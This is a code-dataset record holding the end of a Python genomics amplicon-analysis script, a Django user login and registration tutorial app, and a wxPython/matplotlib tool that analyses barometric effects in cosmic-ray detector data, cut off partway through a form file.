for x in g if isinstance(x,str)])).to_frame().reset_index()\r\n dfcnv = pd.merge(dfcnv, temp, how='left', on='Segment ID', copy=False)\r\n\r\n # write to csv files\r\n df_focused_genes.to_csv(open(os.path.join(fast_output_dir, sample_id + '_focused_genes_FAST.csv'), 'w'))\r\n dfamplicons.to_csv(open(os.path.join(fast_output_dir, sample_id + '_amplicons_FAST.csv'),'w'))\r\n dfsegments.to_csv(open(os.path.join(fast_output_dir, sample_id + '_segments_FAST.csv'), 'w'))\r\n dfcnv.to_csv(open(os.path.join(fast_output_dir, sample_id + '_cnv_FAST.csv'),'w'))\r\n dfsv.to_csv(open(os.path.join(fast_output_dir, sample_id + '_sv_FAST.csv'),'w'))\r\n shutil.copyfile(config_file,os.path.join(fast_output_dir, sample_id + '_config.txt'))\r\n\r\n if excel:\r\n write_excel(fast_output_dir, sample_id, dfcnv, dfsv, dfamplicons, dfsegments, df_focused_genes)\r\n\r\nif __name__==\"__main__\":\r\n\r\n parser = argparse.ArgumentParser(description='Analyze amplicon structure base on CNV and SV data.')\r\n parser.add_argument('--config', '-c', type=str, required = True)\r\n parser.add_argument('--excel', '-e', action='store_true', default = False, help = 'generated colored excel file')\r\n parser.add_argument('--remove_unmappble', '-r', action='store_true', default = False, help = 'remove unmappable regions')\r\n parser.add_argument('--not_unify_seg', '-n', action='store_true', default=False, help='do not unify consecutive segments')\r\n\r\n args = parser.parse_args()\r\n\r\n CP.readfp(open(args.config))\r\n\r\n timestr = time.strftime(\"%Y%m%d_%H%M%S\")\r\n log = 'Fast_log_%s.csv' % timestr\r\n f_log = open(os.path.join(CP.get('FILES', 'FAST_OUTPUT_DIR'), log),'w')\r\n\r\n focused_locuses = [FL(*fl) for fl in csv.reader(open(CP.get('FILES','GENES')))]\r\n\r\n sample_id = CP.get('FILES','SAMPLE_ID')\r\n run(args.excel, args.remove_unmappble, not (args.not_unify_seg), args.config, sample_id, CP.get('FILES', 'CNV_INP'),\r\n CP.get('FILES', 'SV_INP'), CP.get('FILES', 'FAST_OUTPUT_DIR'), focused_locuses)\r\n # try:\r\n # run(args.excel, args.remove_unmappble, not (args.not_unify_seg), args.config, sample_id, CP.get('FILES', 'CNV_INP'), CP.get('FILES', 'SV_INP'), CP.get('FILES', 'FAST_OUTPUT_DIR'), focused_locuses)\r\n # except Exception as E:\r\n # print >> f_log, '%s, %s, FAILED: %s' % (datetime.datetime.now(), sample_id, E)\r\n # else:\r\n # print >> f_log, '%s, %s, SUCCESS' % (datetime.datetime.now(), sample_id)\r\n #\r\n # f_log.close()\r\n" } ]
4
siddharth-arora/django-deployment-example
https://github.com/siddharth-arora/django-deployment-example
f9e146e520c7f1cbada82c6b1af223c5f198c88d
8a739a8100967cbded8fa5cd90e24aad9bdbb861
ac2c5237fa5af08eef047c1b818ec78dc0ea485f
refs/heads/master
2020-07-25T23:31:24.360068
2019-09-21T06:48:22
2019-09-21T06:48:22
208,456,732
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6034953594207764, "alphanum_fraction": 0.6048607230186462, "avg_line_length": 33.224300384521484, "blob_id": "183d61ab9af8d06ec733bcd477d92cdb416c9fce", "content_id": "1b376cf1d38810f3d924f12318ff6019fff4879d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3662, "license_type": "no_license", "max_line_length": 113, "num_lines": 107, "path": "/user_management_project/basic_app/views.py", "repo_name": "siddharth-arora/django-deployment-example", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom basic_app.forms import UserForm, UserProfileInfoForm\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import reverse\n\n# Create your views here.\ndef index(request):\n return render(request,'basic_app/index.html')\n\ndef user_login(request):\n #check if the form has been submitted\n if request.method == 'POST':\n #get the data from the form\n uname = request.POST.get('username')\n passw = request.POST.get('password')\n #authenticate the user\n user = authenticate(username=uname, password=passw)\n #check if the user is autheticated or not\n if user:\n #check if the user is an active user\n if user.is_active:\n #user is autheticated & active\n #print(\"user is autheticated & active\")\n #login the user - activate the login status of the user\n login(request, user)\n #print(\"user logged in\")\n #redirect the user to the post login Page\n #return HttpResponseRedirect('URL')\n #or\n #return HttpResponseRedirect(reverse('URL_Name'))\n return HttpResponseRedirect(reverse('userhome'))\n else:\n #user is autheticated & inactive\n #print(\"user is autheticated & inactive\")\n #display some message on the screen\n return HttpResponse(\"<h1>User Inactive!</h1>\")\n else:\n #print(\"Unauthenticated Login attempt!\")\n #display some message on the screen\n #return HttpResponse(\"<h1>User Unauthenticated!</h1>\")\n return render(request,'basic_app/login.html',{'err':'Invalid User Credentials!'})\n\n else:\n return render(request,'basic_app/login.html')\n\n@login_required\ndef userhome(request):\n return render(request, 'basic_app/userhome.html')\n\n@login_required\ndef userlogout(request):\n #logout the user programatically\n logout(request)\n #redirect the user\n return HttpResponseRedirect(reverse('login'))\n\ndef register(request):\n\n registered = False\n\n if request.method == 'POST':\n #form submitted\n user_form = UserForm(data=request.POST)\n profile_form = UserProfileInfoForm(data=request.POST)\n #check form validity\n if user_form.is_valid() and profile_form.is_valid():\n #form is valid\n\n #save the user_form\n user = user_form.save()\n #hash the password\n user.set_password(user.password)\n #save\n user.save()\n\n #save the profile_form - but do not commit the changes as yet as the file & other data is not present\n profile = profile_form.save(commit=False)\n #set the profile's user\n profile.user = user\n\n #update profile_pic\n if 'profile_pic' in request.FILES:\n profile.profile_pic = request.FILES['profile_pic']\n\n #finally save the profile form\n profile.save()\n\n registered=True\n else:\n #form is invalid\n print(user_form.errors)\n print(profile_form.errors)\n else:\n #1st time load\n #create empty forms\n user_form = UserForm()\n profile_form = UserProfileInfoForm()\n\n\n return render(request,'basic_app/register.html',\n {\n 'user_form' : user_form,\n 'profile_form' : profile_form,\n 'registered' : registered\n })\n" }, { "alpha_fraction": 0.7195876240730286, "alphanum_fraction": 0.7195876240730286, "avg_line_length": 31.33333396911621, "blob_id": "e0ade41c5312e7e2d9917941c68b12a4854e24f7", "content_id": "b722cb01e0f6b0b41197ec1ead056fb7daae365e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 485, "license_type": "no_license", "max_line_length": 72, "num_lines": 15, "path": "/user_management_project/basic_app/models.py", "repo_name": "siddharth-arora/django-deployment-example", "src_encoding": "UTF-8", "text": "from django.db import models\n#import User object\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass UserProfileInfo(models.Model):\n #declare a foreign key object of the User\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n #additional features\n portfolio_site = models.URLField(blank=True)\n profile_pic = models.ImageField(blank=True,upload_to='profile_pics')\n\n #__str__()\n def __str__(self):\n return self.user.username\n" } ]
2
eskaler/Uragan
https://github.com/eskaler/Uragan
5970d3f976cd9638a35ea47b31d70b060c766547
be6936058917ee549ecb4b7efa878b6d429d6975
769f41268f40d8c123a2963be6ce5dc0d02e84f0
refs/heads/master
2021-07-17T11:44:42.750686
2020-07-15T06:50:15
2020-07-15T06:50:15
192,679,802
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5724172592163086, "alphanum_fraction": 0.6036239862442017, "avg_line_length": 35.962791442871094, "blob_id": "e33f1df0e6b3349b413f4b141195c3e83e27757e", "content_id": "d909205bbb9f26d4438c454c6ef75ad0a1966278", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8089, "license_type": "no_license", "max_line_length": 199, "num_lines": 215, "path": "/fbp/form.py", "repo_name": "eskaler/Uragan", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n###########################################################################\n## Python code generated with wxFormBuilder (version Jun 17 2015)\n## http://www.wxformbuilder.org/\n##\n## PLEASE DO \"NOT\" EDIT THIS FILE!\n###########################################################################\n\nimport wx\n\n\nimport wx.xrc\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_wxagg import \\\nFigureCanvasWxAgg as FigureCanvas\nfrom matplotlib.backends.backend_wx import NavigationToolbar2Wx\nfrom detectorData import DetectorData\n\n###########################################################################\n## Class mainFrame\n###########################################################################\n\nclass mainFrame ( wx.Frame ):\n\n Data = None\n\n def __init__( self, parent ):\n wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u\"Обработка данных детектора\", pos = wx.DefaultPosition, size = wx.Size( 737,425 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )\n\n self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )\n\n bSizer1 = wx.BoxSizer( wx.VERTICAL )\n\n self.m_panel2 = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )\n self.m_panel2.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )\n self.m_panel2.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_3DLIGHT ) )\n\n bSizer61 = wx.BoxSizer( wx.VERTICAL )\n\n gSizer21 = wx.GridSizer( 0, 2, 0, 0 )\n\n bSizer6 = wx.BoxSizer( wx.VERTICAL )\n\t\t\n self.graphPanel1 = wx.Panel( self.m_panel2, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )\n bSizer14 = wx.BoxSizer( wx.VERTICAL )\n\t\t\n\t\t\n self.graphPanel1.SetSizer( bSizer14 )\n self.graphPanel1.Layout()\n bSizer14.Fit( self.graphPanel1 )\n bSizer6.Add( self.graphPanel1, 1, wx.EXPAND |wx.ALL, 5 )\n\n###########\n self.figure1 = Figure()\n #self.axes1 = self.figure.add_subplot(111)\n self.canvas1 = FigureCanvas(self, wx.ID_ANY, self.figure1)\n bSizer14.Add(self.canvas1, 1, wx.LEFT | wx.TOP | wx.EXPAND)\n self.toolbar1 = NavigationToolbar2Wx(self.canvas1)\n self.toolbar1.Realize()\n bSizer14.Add(self.toolbar1, 0, wx.LEFT | wx.EXPAND)\n self.toolbar1.Show()\n self.Fit()\n################\n\n gSizer21.Add( bSizer14, 2, wx.EXPAND, 5 )\n\n bSizer7 = wx.BoxSizer( wx.VERTICAL )\n\n self.m_staticText4 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"MyLabel\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText4.Wrap( -1 )\n self.m_staticText4.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_INFOTEXT ) )\n\n bSizer7.Add( self.m_staticText4, 0, wx.ALL, 5 )\n\n self.m_staticText5 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"MyLabel\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText5.Wrap( -1 )\n self.m_staticText5.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_INFOTEXT ) )\n\n bSizer7.Add( self.m_staticText5, 0, wx.ALL, 5 )\n\n self.m_staticText6 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"MyLabel\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText6.Wrap( -1 )\n self.m_staticText6.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_INFOTEXT ) )\n\n bSizer7.Add( self.m_staticText6, 0, wx.ALL, 5 )\n\n\n gSizer21.Add( bSizer7, 0, wx.EXPAND, 5 )\n\n\n bSizer61.Add( gSizer21, 1, wx.EXPAND, 5 )\n\n gSizer3 = wx.GridSizer( 0, 2, 0, 0 )\n\n bSizer62 = wx.BoxSizer( wx.VERTICAL )\n\n\n gSizer3.Add( bSizer62, 1, wx.EXPAND, 5 )\n\n bSizer71 = wx.BoxSizer( wx.VERTICAL )\n\n self.m_staticText41 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"MyLabel\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText41.Wrap( -1 )\n self.m_staticText41.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_INFOTEXT ) )\n\n bSizer71.Add( self.m_staticText41, 0, wx.ALL, 5 )\n\n self.m_staticText51 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"MyLabel\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText51.Wrap( -1 )\n self.m_staticText51.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_INFOTEXT ) )\n\n bSizer71.Add( self.m_staticText51, 0, wx.ALL, 5 )\n\n self.m_staticText61 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"MyLabel\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText61.Wrap( -1 )\n self.m_staticText61.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_INFOTEXT ) )\n\n bSizer71.Add( self.m_staticText61, 0, wx.ALL, 5 )\n\n\n gSizer3.Add( bSizer71, 1, wx.EXPAND, 5 )\n\n\n bSizer61.Add( gSizer3, 1, wx.EXPAND, 5 )\n\n\n self.m_panel2.SetSizer( bSizer61 )\n self.m_panel2.Layout()\n bSizer61.Fit( self.m_panel2 )\n bSizer1.Add( self.m_panel2, 1, wx.EXPAND, 5 )\n\n\n self.SetSizer( bSizer1 )\n self.Layout()\n self.m_menubar1 = wx.MenuBar( 0 )\n self.m_menu1 = wx.Menu()\n self.m_menuItem1 = wx.MenuItem( self.m_menu1, wx.ID_ANY, u\"Открыть...\", wx.EmptyString, wx.ITEM_NORMAL )\n self.m_menu1.AppendItem( self.m_menuItem1 )\n\n self.m_menu1.AppendSeparator()\n\n self.m_menuItem2 = wx.MenuItem( self.m_menu1, wx.ID_ANY, u\"Выход\", wx.EmptyString, wx.ITEM_NORMAL )\n self.m_menu1.AppendItem( self.m_menuItem2 )\n\n self.m_menubar1.Append( self.m_menu1, u\"Файл\" )\n\n self.m_menu2 = wx.Menu()\n self.m_menuItem3 = wx.MenuItem( self.m_menu2, wx.ID_ANY, u\"График 1\", wx.EmptyString, wx.ITEM_CHECK )\n self.m_menu2.AppendItem( self.m_menuItem3 )\n self.m_menuItem3.Check( True )\n\n self.m_menuItem4 = wx.MenuItem( self.m_menu2, wx.ID_ANY, u\"График 2\", wx.EmptyString, wx.ITEM_CHECK )\n self.m_menu2.AppendItem( self.m_menuItem4 )\n self.m_menuItem4.Check( True )\n\n self.m_menubar1.Append( self.m_menu2, u\"Показать\" )\n\n self.SetMenuBar( self.m_menubar1 )\n\n\n self.Centre( wx.BOTH )\n\n # COnnect events\n self.Bind( wx.EVT_MENU, self.openFile, id = self.m_menuItem1.GetId() )\n self.Bind( wx.EVT_MENU, self.showGraph1, id = self.m_menuItem3.GetId() )\n\n def showGraph1( self, event ):\n if self.m_menuItem3.IsChecked() == False:\n self.graphPanel1.Hide()\n self.canvas1.Hide()\n self.toolbar1.Hide()\n else:\n self.graphPanel1.Show()\n self.canvas1.Show()\n self.toolbar1.Show()\n\n def __del__( self ):\n pass\n\n\n def openFile( self, event ):\n with wx.FileDialog(self, \"Открыть файл данных детектора\", wildcard=\"DAT файлы (*.dat)|*.dat\",\n style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST) as fileDialog:\n\n if fileDialog.ShowModal() == wx.ID_CANCEL:\n return # the user changed their mind\n\n # Proceed loading the file chosen by the user\n pathname = fileDialog.GetPath()\n try:\n self.Data = DetectorData(pathname)\n self.axes1 = self.figure1.add_subplot(111)\n self.axes1.plot( self.Data.datTim, self.Data.inten )\n self.axes1.set_xlabel(\"Время хуемя\")\n self.axes1.set_ylabel(\"Интенсивность\")\n\n self.axes2 = self.figure1.add_subplot(111)\n self.axes2.plot( self.Data.datTim, self.Data.press )\n self.axes2.set_ylabel(\"Давление\")\n\n except IOError:\n wx.LogError(\"Не удалось открыть файл '%s'.\" % newfile)\n\nclass DetectorApp(wx.App):\n\n # wxWidgets calls this method to initialize the application\n def OnInit(self):\n\n # Create an instance of our customized Frame class\n frame = mainFrame(None)\n frame.Show(True)\n\n # Return a success flag\n return True\n" }, { "alpha_fraction": 0.805084764957428, "alphanum_fraction": 0.805084764957428, "avg_line_length": 18.66666603088379, "blob_id": "3f3acd8092560f541e10dd886e0d4ba37a2e06f1", "content_id": "bd920b6c5bba00e8abca9d3e02905342d6203694", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 118, "license_type": "no_license", "max_line_length": 31, "num_lines": 6, "path": "/main.py", "repo_name": "eskaler/Uragan", "src_encoding": "UTF-8", "text": "import detectorApp\nimport numpy.core._methods\nimport numpy.lib.format\n\napp = detectorApp.DetectorApp()\napp.MainLoop()\n" }, { "alpha_fraction": 0.5792239904403687, "alphanum_fraction": 0.6068944334983826, "avg_line_length": 37.278106689453125, "blob_id": "4b26bf7e1463522d051d6371bc82fdfa11f730ec", "content_id": "f8f8e8550516ac2cdf244806e425c1becc1d5739", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6667, "license_type": "no_license", "max_line_length": 170, "num_lines": 169, "path": "/detectorApp.py", "repo_name": "eskaler/Uragan", "src_encoding": "UTF-8", "text": "import wx\nimport wx.xrc\nfrom detectorData import DetectorData\nimport detectorForm\nfrom matplotlib import dates\nfrom functools import partial\n#import numpy as np\n\nclass EventHandler(detectorForm.MainFrame):\n \"\"\"Класс наследующий форму и содержащий обработку ее событий\"\"\"\n\n Data = []\n\n def __init__(self):\n\n self.initForm(None)\n #бинды на события\n self.Bind( wx.EVT_MENU, self.openFile, id = self.m_mbopenFile.GetId() )\n self.Bind( wx.EVT_MENU, self.exitApp, id = self.m_mbexit.GetId() )\n #self.Bind( wx.EVT_MENU, self.showGraph1, id = self.m_mbGraph1.GetId() )\n #self.Bind( wx.EVT_MENU, self.showGraph2, id = self.m_mbGraph2.GetId() )\n self.m_checkBox1.Bind(wx.EVT_CHECKBOX, lambda evt, checkit=self.m_checkBox1, figure=self.figure1, axisno=0 : self.hideGraph(evt, checkit, figure, axisno))\n self.m_checkBox2.Bind(wx.EVT_CHECKBOX, lambda evt, checkit=self.m_checkBox2, figure=self.figure1, axisno=1 : self.hideGraph(evt, checkit, figure, axisno))\n self.m_checkBox3.Bind(wx.EVT_CHECKBOX, lambda evt, checkit=self.m_checkBox3, figure=self.figure1, axisno=2 : self.hideGraph(evt, checkit, figure, axisno))\n #self.m_checkBox1.Bind(wx.EVT_CHECKBOX, partial( self.hideGraph, checkit=self.m_checkBox1.IsChecked, figure=self.figure1, axisno=0))\n\n\n\n def openFile(self, event):\n with wx.FileDialog(self, \"Открыть файл данных детектора\", wildcard=\"DAT файлы (*.dat)|*.dat\",\n style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST) as fileDialog:\n\n if fileDialog.ShowModal() == wx.ID_CANCEL:\n return\n\n\n pathname = fileDialog.GetPath()\n try:\n\n self.Data = DetectorData(pathname)\n self.drawGraph1()\n\n self.SetTitle(pathname)\n self.m_checkBox1.SetValue(True)\n self.m_checkBox2.SetValue(True)\n self.m_checkBox3.SetValue(True)\n\n except IOError:\n wx.LogError(\"Не удалось открыть файл '%s'.\" % newfile)\n\n def drawGraph1(self):\n\n self.figure1.clear()\n\n self.axes1 = self.figure1.add_subplot(111)\n self.axes1.plot_date( self.Data.datTim, self.Data.inten, 'b' )\n self.axes1.set_xlabel(\"Дата\")\n self.axes1.set_ylabel(r\"Темп счета нейтронов, \"+self.Data.intenName, color='blue')\n self.axes1.xaxis.set_major_formatter(dates.DateFormatter('%d-%m-%Y %H:%M'))\n\n self.axes2 = self.axes1.twinx()\n self.axes2.plot_date( self.Data.datTim, self.Data.press, '#FFA500' )\n self.axes2.set_ylabel(\"Давление, $мбар$\", color='#FFA500')\n\n self.axes1f = self.axes1.twiny()\n self.axes1f.set_xticklabels([])\n self.axes1f.plot_date( self.Data.datTim, self.Data.intenFixed, 'g' )\n\n self.figure1.autofmt_xdate(bottom=0.18)\n\n self.canvas1.draw()\n self.canvas1.Refresh()\n print(self.figure1.axes)\n\n #right thing\n self.figure2.clear()\n\n self.axes3 = self.figure2.add_subplot(111)\n self.axes3.plot( self.Data.press, self.Data.inten, linestyle='None', marker='o', markerfacecolor='white', color='b' )\n self.axes3.set_ylabel(r\"Темп счета нейтронов, \"+self.Data.intenName)\n self.axes3.set_xlabel(\"Давление, $мбар$\")\n self.axes3.text(0.6, 0.8, 'A = {0} {1}\\nB = {2} {3} {4}'.format(self.Data.A,\n self.Data.intenName, self.Data.B, self.Data.intenName, '$мбар^{-1}$'), color='r', horizontalalignment='left',\n verticalalignment='center', transform = self.axes3.transAxes)\n\n\n self.axes4 = self.figure2.add_subplot(111)\n self.axes4.plot( self.Data.press, self.Data.intenFixed, linestyle='None', marker='o', markerfacecolor='white', color='g')\n\n self.axes3f = self.axes3.twiny()\n self.axes3f.plot(self.Data.press, self.Data.p(self.Data.press), color='r')\n\n\n self.canvas2.draw()\n self.canvas2.Refresh()\n\n\n #\n\n #ooh whatever\n self.m_staticText4.SetLabel(\"min: {0}\\nmax: {1}\\navg: {2}\".format(self.Data.iMin, self.Data.iMax, self.Data.I0[0]))\n self.m_staticText5.SetLabel(\"min: {0}\\nmax: {1}\\navg: {2}\".format(self.Data.pMin, self.Data.pMax, self.Data.P0[0]))\n self.m_staticText6.SetLabel(\"min: {0}\\nmax: {1}\\navg: {2}\".format(self.Data.ifMin, self.Data.ifMax, round(sum(self.Data.intenFixed)/len(self.Data.intenFixed),2)))\n\n self.m_staticText7.SetLabel(\"P0 = {0} ± {1} мбар\".format(self.Data.P0[0], self.Data.P0[1]))\n self.m_staticText8.SetLabel(\"I0 = {0} ± {1} {2}\".format(self.Data.I0[0], self.Data.I0[1], self.Data.intenName[1:-1].replace('^{-1}', '\\u207B\\u00B9')))\n self.m_staticText9.SetLabel(\"B = {0} {1} {2}\".format(self.Data.B, self.Data.intenName[1:-1].replace('^{-1}', '\\u207B\\u00B9'), u\"мбар\\u207B\\u00B9\"))\n self.m_staticText10.SetLabel(\"β = {0} %/мбар\".format(self.Data.beta))\n\n def hideGraph( self, event, checkit, figure, axisno):\n print(checkit.GetValue(), figure.axes[axisno])\n figure.axes[axisno].set_visible(checkit.GetValue())\n figure.axes[axisno].xaxis.set_visible(True)\n #figure.axes[0].xaxis.set_visible(True)\n #figure.axes[axisno].xticks.set_visible(True)\n self.canvas1.draw()\n\n def showGraph1(self, event):\n if self.m_mbGraph1.IsChecked() == False:\n #self.graphPanel1.Hide()\n self.canvas1.Hide()\n self.toolbar1.Hide()\n self.m_panel1.Hide()\n #self.gSizer1.Layout()\n #self.canvas2.Fit()\n #self.toolbar2.Fit()\n #self.m_panel2.Fit()\n self.Refresh()\n\n else:\n #self.graphPanel1.Show()\n self.canvas1.Show()\n self.toolbar1.Show()\n self.m_panel1.Show()\n self.Refresh()\n\n def showGraph2(self, event):\n if self.m_mbGraph2.IsChecked() == False:\n #self.graphPanel1.Hide()\n self.canvas2.Hide()\n self.toolbar2.Hide()\n self.m_panel2.Hide()\n self.Refresh()\n\n else:\n #self.graphPanel1.Show()\n self.canvas2.Show()\n self.toolbar2.Show()\n self.m_panel2.Show()\n self.Refresh()\n\n def exitApp(self, event):\n wx.Frame.close()\n\n def __del__( self ):\n pass\n\n\n\n\nclass DetectorApp(wx.App):\n\n def OnInit(self):\n\n frame = EventHandler()\n frame.Show(True)\n frame.Maximize(True)\n\n return True\n" }, { "alpha_fraction": 0.5029423236846924, "alphanum_fraction": 0.5237348079681396, "avg_line_length": 28.964706420898438, "blob_id": "5069eb48dff8f3c30d70493a8d8432860e5cdd1d", "content_id": "77c3d6558a6e1b35f4ad9aad154c29d3cfea5898", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2612, "license_type": "no_license", "max_line_length": 112, "num_lines": 85, "path": "/detectorData.py", "repo_name": "eskaler/Uragan", "src_encoding": "UTF-8", "text": "import dateutil.parser\nfrom matplotlib import dates\nimport datetime as dt\nimport numpy as np\n\nclass DetectorData:\n \"\"\"Класс обеспечивающий парсинг и хранение данных из файлов детекторов\"\"\"\n\n datTim = []\n press = []\n inten = []\n intenFixed = []\n fit = []\n A = 0\n B = 0\n iMax, iMin = 0, 0\n pMax, pMin = 0, 0\n ifMax, ifMin = 0, 0\n intenName = \" \"\n p = None\n\n P0=[]\n I0=[]\n beta=0\n\n def parseFile(self, fileName):\n if \"URG\" in fileName:\n self.intenName = \"$ с^{-1}$\"\n i = 2\n p = 1\n else:\n self.intenName = \"$ мин^{-1}$\"\n i = 1\n p = 2\n with open(fileName) as data:\n next(data)\n for line in data:\n line = line.strip().split(\"\\t\")\n self.datTim.append(line[0])\n self.press.append(float(line[p]))\n self.inten.append(float(line[i]))\n data.close()\n self.datTim = [dateutil.parser.datetime.datetime.strptime(s, '%d.%m.%Y %H:%M') for s in self.datTim]\n self.datTim = dates.date2num(self.datTim)\n\n self.pMax, self.pMin = round(max(self.press),2), round(min(self.press),2)\n self.iMax, self.iMin = round(max(self.inten),2), round(min(self.inten),2)\n self.P0 = [round(np.mean(self.press), 2), round(np.std(self.press),2)]\n print(self.P0[0], self.P0[1])\n self.I0 = [round(np.mean(self.inten), 2), round(np.std(self.inten), 2)]\n\n\n\n return 1\n\n def intenFix(self):\n n = len(self.inten)\n\n self.B = round((n*sum(self.press[i]*self.inten[i] for i in range(0, n)) -\n sum(self.inten)*sum(self.press))/(n*sum(p*p for p in self.press) - pow(sum(self.press), 2)), 2)\n\n self.A = round((sum(self.inten) - self.B * sum(self.press)) / n, 2)\n\n z = np.polyfit(self.press, self.inten, 1)\n self.p = np.poly1d(z)\n\n print (\"y = {0} + {1}x\".format(self.A, self.B))\n\n\n pavg = sum(self.press)/float(len(self.press))\n self.intenFixed = [self.inten[i] + self.B*(pavg - self.press[i]) for i in range(0, n)]\n self.ifMax, self.ifMin = round(max(self.intenFixed),2), round(min(self.intenFixed),2)\n self.beta = round(self.B/self.I0[0]*100, 2)\n\n def __init__(self, fileName):\n self.datTim = []\n self.press = []\n self.inten = []\n self.intenFixed = []\n self.fit = []\n self.P0 =[]\n self.I0 = []\n\n self.parseFile(fileName)\n self.intenFix()\n\n\n" }, { "alpha_fraction": 0.7935943007469177, "alphanum_fraction": 0.7971529960632324, "avg_line_length": 39.14285659790039, "blob_id": "66b9551221e5c4d3f2309d50a80b802b715dc443", "content_id": "8876e22eb7092affef9d647bddaca3941328c536", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 940, "license_type": "no_license", "max_line_length": 191, "num_lines": 14, "path": "/readme.md", "repo_name": "eskaler/Uragan", "src_encoding": "UTF-8", "text": "# Uragan\n\nПрограмма расчета барометрических коэффициентов для мюонного годоскопа УРАГАН (МГ) и Московского нейтронного монитора (МНМ, ИЗМИРАН).\n\nСоздана для выполнения лабораторной работы \"Исследование барометрического эффекта в потоке мюонов и нейтронов\", описание работы находится в файле [ЛаптевАП_Отчет.docx](./ЛаптевАП_Отчет.docx).\n\nДанные с мюонного годоскопа УРАГАН (МГ) и Московского нейтронного монитора (МНМ, ИЗМИРАН) находятся в папке [testData](./testData/)\n\nИспользованные технологии:\n* Python 3.7\n* matplotlib\n* wxWidgets\n\n![uragan](./uragan.jpg)\n" }, { "alpha_fraction": 0.5958926677703857, "alphanum_fraction": 0.6303411722183228, "avg_line_length": 37.94193649291992, "blob_id": "0cccd0352a44110fd6e777418845e759a859a4fd", "content_id": "d5e643d31ba9fe3b7c484cf1875445c4b11585e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6178, "license_type": "no_license", "max_line_length": 211, "num_lines": 155, "path": "/lab1/source/detectorForm.py", "repo_name": "eskaler/Uragan", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n## Python code generated with wxFormBuilder (version Jun 17 2015)\n\nimport wx\nimport wx.xrc\n##\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_wxagg import \\\nFigureCanvasWxAgg as FigureCanvas\nfrom matplotlib.backends.backend_wx import NavigationToolbar2Wx\n\n\nclass MainFrame ( wx.Frame ):\n\n def initForm( self, parent ):\n wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u\"Обработка данных детектора\", pos = wx.DefaultPosition, size = wx.Size( 500,300 ), style = wx.DEFAULT_FRAME_STYLE|wx.MAXIMIZE|wx.TAB_TRAVERSAL )\n\n self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )\n\n gSizer1 = wx.GridSizer( 0, 2, 0, 1 )\n\n bSizer2 = wx.BoxSizer( wx.VERTICAL )\n\n self.m_panel1 = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )\n self.m_panel1.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_MENU ) )\n\n gSizer4 = wx.GridSizer( 2, 3, 0, 0 )\n\n self.m_checkBox1 = wx.CheckBox( self.m_panel1, wx.ID_ANY, u\"Темп счета нейтронов (без учета БЭ)\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_checkBox1.SetValue(True)\n gSizer4.Add( self.m_checkBox1, 0, wx.ALL, 1 )\n\n self.m_checkBox2 = wx.CheckBox( self.m_panel1, wx.ID_ANY, u\"Давление\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_checkBox2.SetValue(True)\n gSizer4.Add( self.m_checkBox2, 0, wx.ALL, 1 )\n\n self.m_checkBox3 = wx.CheckBox( self.m_panel1, wx.ID_ANY, u\"Темп счета нейтронов(с учетом БЭ)\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_checkBox3.SetValue(True)\n gSizer4.Add( self.m_checkBox3, 0, wx.ALL, 1 )\n\n\n self.m_staticText4 = 